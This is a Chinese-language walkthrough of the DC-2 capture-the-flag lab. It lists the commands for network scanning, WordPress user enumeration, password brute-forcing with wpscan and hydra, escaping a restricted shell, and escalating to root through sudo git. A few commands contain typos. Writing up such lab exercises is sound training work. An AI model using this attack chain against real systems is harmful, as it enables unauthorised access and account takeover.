打开虚拟机
扫描网段arp-scan -l
得出dc-2的IP的地址:172.16.16.133
然后进行端口扫描,发现开放,高危端口。Nmap -p 1-65535 -sV 172.16.16.133
发现80端口,进行访问一下,发现访问不了。
原因是没有dns解析,需要添加dns解析。
解析文件:c:\windows\system32\disvers\etc\hosts.txt
把172.16.16.133 dc-2添加到最后面就可以了
然后进行访问一下
可以得到第一个flag
进行页面探索:发现用的是wordpress管理系统
一般来说wp的默认登录界面是wp-login.php,我们在浏览器地址栏进行尝试
如果尝试不成功,我们可以用御剑去扫描网站目录,或者用kali上的dirsreach工具去扫描目录,看看有没有扫描信息泄露
然后进行扫描,扫描出用户:wpscan --url http://dc-2/ -e u
可以看到有三个用户。
把这三个用户放到一个文件里面,后面进行暴力破解。
然后根据用户来生成字典:cewl http://dc-2/ -w passwd.txt
然后用两个文件去进行暴力破解:wpscan --url httpp://dc-2/ -U dc-2-users.txt -P passwd.txt
得到两个用户和密码。
然后进行登陆,可以找到flag2
然后后面还开放了7744端口,可以ssh远程连接
这里我们使用hydra和刚刚已生成的密码字典,对已知的用户名进行ssh登录密码的爆破
Hydra -L dc-2-users.txt -P passwd.txt 172.16.16.133 ssh -s 7744
我们使用tom进行ssh登录:ssh tom@172.16.16.133 -p 7744
可以找到flag3,但是cat命令用不了
那么我们使用echo $PATH查看当前路径,再使用ls usr/bin查看目录结构,发现我们 可以使用less ls scp vi这几个命令
可以用vi打开flag3
现在需要想办法使用切换用户的命令。调用/bin/sh命令解释器,输入BASH_CMDS[a]=/bin/sh,然后切换环境变量,输入export PATH=PATH:/bash,然后在输入cat flag3.txt,我们可以看到已经可以使用该命令了
接下来用su切换用户,输入su jerry然后再输入刚刚爆破出的密码切换到jerry用户
然后ls一下,可以看到flag4
然后cat查看
文件提示我们使用git命令
输入sudo -l发现可以使用git命令,可以使用root权限,但不需要root密码
加下来使用git提权,输入sudo git help config
然后在编辑模式下输入!/bin/sh即可看到提权成功
然后使用passwd root来修改root用户密码
回到原来位置,切换到root用户
就可以拿到最后的flag